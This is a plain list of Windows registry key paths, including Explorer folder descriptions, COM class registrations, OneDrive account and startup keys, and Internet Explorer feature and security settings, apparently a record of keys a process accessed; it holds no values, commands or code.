HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\DefinitionFlags
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\OneDrive\CurrentVersionPath
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\AppID
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\MainAccount
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\UserFolder
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\cid
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\DisplayName
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\UserEmail
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\Business
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\SharePointOnPrem
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\FirstRun
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\EdpManaged
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\RootAddedToFavorites
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\TenantAddedToFavorites
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\HasMadeFirstUpload
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\IsUpgradeAvailable
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\CrashDetectionKey
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\ForceLogUpload
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\EnableADALForSilentBusinessConfig
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\LastKnownCloudFilesEnabled
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\FirstRunSignInOrigin
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\ExpressSignInCompletedState
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\LatestSignInStack
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\WamWebAccountId
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\OneAuthAccountId
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\OneAuthUnrecoverableFailureTimeStamp
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\OneAuthUnrecoverableFailureTag
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\OneAuthClientIdUpperCase
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\OneDriveDeviceId
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\LastShutdownReason
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\DisablePersonalSync
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\DEPOff
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Theme\FontScale
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AvoidKnownFolderCaching
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AvoidKnownFolderCaching
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParsingName_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DefinitionFlags
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\ParsingName_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\DefinitionFlags
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{a168aadc-1674-49da-ad4f-4f27df8760d0}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\AppID
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableZlibDeflate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
